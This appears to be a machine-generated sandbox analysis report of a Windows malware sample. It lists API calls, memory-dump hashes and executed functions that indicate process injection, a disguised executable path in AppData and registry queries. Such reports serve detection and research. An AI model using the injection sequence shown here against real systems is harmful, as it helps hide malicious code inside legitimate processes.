                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 53cd91900ee9effdd22f040d3cdf55fb1ba8092932ec5e4a9134ea0ddd9f06f1
                                        • Instruction ID: 52dcbc17e368f4fd98bcb576f5c72914342276f4afde7bb57db64d8f116b6bcb
                                        • Opcode Fuzzy Hash: 53cd91900ee9effdd22f040d3cdf55fb1ba8092932ec5e4a9134ea0ddd9f06f1
                                        • Instruction Fuzzy Hash: 96916C71D0021A9FDF24DF68C8447EDBBF6BF88314F0485A9E859A7240DB749985CF92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 05121299
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 82b2015d5e2014582e8deda964b2167505c58880af43694fb222e366c652a333
                                        • Instruction ID: 106e916b32bae4e2cb531ba8a0b683743162df03d07a42fddb748a7e07fec521
                                        • Opcode Fuzzy Hash: 82b2015d5e2014582e8deda964b2167505c58880af43694fb222e366c652a333
                                        • Instruction Fuzzy Hash: 8AA14A70E44219ABDB18DFA9D485BDCBBF2BF45354F188199D002BB390D774D8A5CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 05121299
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 6a8a238acd809c1b6b3c31e76b771e779a1ceffeb70c3fc26d4bf4152e8db5a0
                                        • Instruction ID: 02de2e302c9e148092ba678a28cc2c5483925daf78efc76f3d4dc68d29820812
                                        • Opcode Fuzzy Hash: 6a8a238acd809c1b6b3c31e76b771e779a1ceffeb70c3fc26d4bf4152e8db5a0
                                        • Instruction Fuzzy Hash: 53616870D00259EBDB18DFA9D488BDDBBF2BF89314F188559D002BB384C774A8A5CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0103F408
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 6ff508d6e737d4d20f8faa3aeab7022592e30977997e2c9745f9355f9b5dffc2
                                        • Instruction ID: c225300cb2d5f72ebed664804262b30116eeba19e680245815a79143e1360386
                                        • Opcode Fuzzy Hash: 6ff508d6e737d4d20f8faa3aeab7022592e30977997e2c9745f9355f9b5dffc2
                                        • Instruction Fuzzy Hash: C92146B59003498FCF00CFA9C8847DEBBF5FF48314F04842AEA59A7640C7789944CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0103F408
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 2961d42bad3a43d9bd3f6d544e6a4514c164ea44a89c09701c0ee2a87c1c9c7e
                                        • Instruction ID: 91a121e39999f4fc2903085f0e5cc6ee4524762bc85b1ce9b944fd7ef15101a3
                                        • Opcode Fuzzy Hash: 2961d42bad3a43d9bd3f6d544e6a4514c164ea44a89c09701c0ee2a87c1c9c7e
                                        • Instruction Fuzzy Hash: EF2127719003499FCF10CFA9C8847DEBBF5FF88314F00842AE959A7240C778A955CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0103F6E8
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: c0f23dae7c17a026387e03efa0ba7df53186dabbee70922b96b52b177e63c145
                                        • Instruction ID: afa9c2f51236d2448c5b99faac42d53593ce98bd5f88fac1a343f47eba03b944
                                        • Opcode Fuzzy Hash: c0f23dae7c17a026387e03efa0ba7df53186dabbee70922b96b52b177e63c145
                                        • Instruction Fuzzy Hash: A6213671C003499FCB00CFA9C884BDEBBF5FF48320F10882AE959A7240C7799955CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 0103E456
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: e35fb2cedc8cdb36d811779ef3bef54f681b04fa7bd24e5a6e596677d0d3a1ab
                                        • Instruction ID: c4c370f28cfb9168b2839588455b51bfe64a7e53473573168116d45e90e5d1c2
                                        • Opcode Fuzzy Hash: e35fb2cedc8cdb36d811779ef3bef54f681b04fa7bd24e5a6e596677d0d3a1ab
                                        • Instruction Fuzzy Hash: 502139719002088FDB10CFA9C4847EEBBF4EF89224F54C42AD959A7241DB78A945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 0103E456
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: af40460504768d8e7258ef53cc2ef70f5b19bbf619877f5f533b73d1e61b39d9
                                        • Instruction ID: a308c9f5ad00bf8688e9baf7e46bb1c43d3810df1c457168f96d7731e60b2629
                                        • Opcode Fuzzy Hash: af40460504768d8e7258ef53cc2ef70f5b19bbf619877f5f533b73d1e61b39d9
                                        • Instruction Fuzzy Hash: C42138719002088FDB10CFAAC4847EEBBF4EF88224F54C42AD559A7240CB78A945CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0103F6E8
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: a75f50b1764c7bfdfe4ebb398f18d67babed43b1fed9c5030c166f010e9d3879
                                        • Instruction ID: c52ac8e887396a12934872d9d011c8796bb89e1eeacc0eb1ada3adbbb0765bdd
                                        • Opcode Fuzzy Hash: a75f50b1764c7bfdfe4ebb398f18d67babed43b1fed9c5030c166f010e9d3879
                                        • Instruction Fuzzy Hash: 81212871D003499FCB10CFA9C8847DEBBF5FF48324F10842AE959A7250C7799945DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 051211EE
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: KernelObjectSecurity
                                        • String ID:
                                        • API String ID: 3015937269-0
                                        • Opcode ID: de2da6be81ecbea60850566c1b87d31b5e11d90566c24ba5e76b74fcaf7af5ea
                                        • Instruction ID: 2775aea24081ade1ec53de82b21838080829d736e7568daa8a53192f1aebf035
                                        • Opcode Fuzzy Hash: de2da6be81ecbea60850566c1b87d31b5e11d90566c24ba5e76b74fcaf7af5ea
                                        • Instruction Fuzzy Hash: B1213BB19002599FCB10CFAAC484BDEBBF4FF88324F14842AE519A7340D778A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 051217C3
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 03edbb7c20d7326b2692474594134cb271f1394665ac905aa6b7ad18e405aafe
                                        • Instruction ID: aa15d0366bd9d84a56ccec76a6be5a442a920127de4e150d23e94be562f8b362
                                        • Opcode Fuzzy Hash: 03edbb7c20d7326b2692474594134cb271f1394665ac905aa6b7ad18e405aafe
                                        • Instruction Fuzzy Hash: B021C2B59002489FCB10DF9AC484BDEFBF4FB88324F14842AE569A7610D779A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 051217C3
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: e69a829aeaa7266617ddd231df6b69f0084eda1c8b1a2f038860aafd4d960ec4
                                        • Instruction ID: 3ff45518b75a1b1f8801e3cdae4189bbbdc9692dc0cf8caebcc3b97aa3bdeaf2
                                        • Opcode Fuzzy Hash: e69a829aeaa7266617ddd231df6b69f0084eda1c8b1a2f038860aafd4d960ec4
                                        • Instruction Fuzzy Hash: DD11E4B59002489FCB10DF9AC484BDEFBF4FB88324F14842AE559A7710D775A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0103F126
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: e01cb21c1814ae6546c09fdc349532a37c0984677fa8a97d53a35b3062ec8c40
                                        • Instruction ID: 57f01285d2cc2b4ccd098717152821f0a77f14eb488afaf7df40f0c1d593c0fd
                                        • Opcode Fuzzy Hash: e01cb21c1814ae6546c09fdc349532a37c0984677fa8a97d53a35b3062ec8c40
                                        • Instruction Fuzzy Hash: 391156729002099FCF10CFA9C8487DEBBF5EB88324F14881AE565A7250C779A944CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0103F126
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: f41f88e9c215c10bc4dfbeb99cd8c56671068a5b6ca80f6397dd47ea5030418d
                                        • Instruction ID: b88e27826830cef6bee19c642787284586ce3714cbbc600f8a9aaebd295770a3
                                        • Opcode Fuzzy Hash: f41f88e9c215c10bc4dfbeb99cd8c56671068a5b6ca80f6397dd47ea5030418d
                                        • Instruction Fuzzy Hash: 1D1167719002099FCF10CFA9C8447DFBBF5EF88324F14881AE565A7210C775A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0103CFAF
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 1e914f93ac7f16fb2249c410690cda092d27b78d2c87564a7f04577ac362d5c6
                                        • Instruction ID: cd4f16d30bd1da05d0fc568a0a34510da8576d70adec11c36bff161243f20ace
                                        • Opcode Fuzzy Hash: 1e914f93ac7f16fb2249c410690cda092d27b78d2c87564a7f04577ac362d5c6
                                        • Instruction Fuzzy Hash: 031158B18042098FDB10DF99C5487EEBBF4EB88324F14842AD559B7340D779A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 74dac57b041aeb114d03fd209d3af5493eb22ce9661453e0aa0dd7b82943a417
                                        • Instruction ID: c31f2af61ede957427acac083bb0e12adc5cc7bbb1ad659c22fc7be5b6712c83
                                        • Opcode Fuzzy Hash: 74dac57b041aeb114d03fd209d3af5493eb22ce9661453e0aa0dd7b82943a417
                                        • Instruction Fuzzy Hash: 871128B19042488BCB10DFAAC4487DEFBF4AB88224F14882AD569B7640C779A944CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 411bd3a0105b64e5139be9a87429f9b46921cc06c91c89eb0dfdbec5ced2e1f8
                                        • Instruction ID: f1b0f27900469e91bdc1b34c1bfc90d92cd3124c00efe0cce2e92ec1c9951403
                                        • Opcode Fuzzy Hash: 411bd3a0105b64e5139be9a87429f9b46921cc06c91c89eb0dfdbec5ced2e1f8
                                        • Instruction Fuzzy Hash: 08113A719043488FCB10DFAAC4487DEFBF4AF88224F14842AD559B7640C779A944CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0103CFAF
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 03620d83c22ce4d6fdeb86cf6975b1225f701569313817556ae0ac5ba7c16404
                                        • Instruction ID: 1ec7499bb6980711ba460e9b0307731b958f1395bd0364a6373ead6577f36bdc
                                        • Opcode Fuzzy Hash: 03620d83c22ce4d6fdeb86cf6975b1225f701569313817556ae0ac5ba7c16404
                                        • Instruction Fuzzy Hash: A61125B28002098FDB10DF99C5897EEBBF4EF88324F15842AD569B7740D779A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Executed Functions

                                        APIs
                                          • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                          • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                          • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                          • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                          • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                          • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                          • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                          • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                        • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                        • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                        • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                        • OpenMutexA.KERNEL32 ref: 00408E80
                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                        • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                          • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                          • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                          • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                        • wcslen.MSVCRT ref: 004090DB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                          • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                          • Part of subcall function 00407E37: CreateDirectoryW.KERNELBASE(00000000), ref: 00407E64
                                          • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
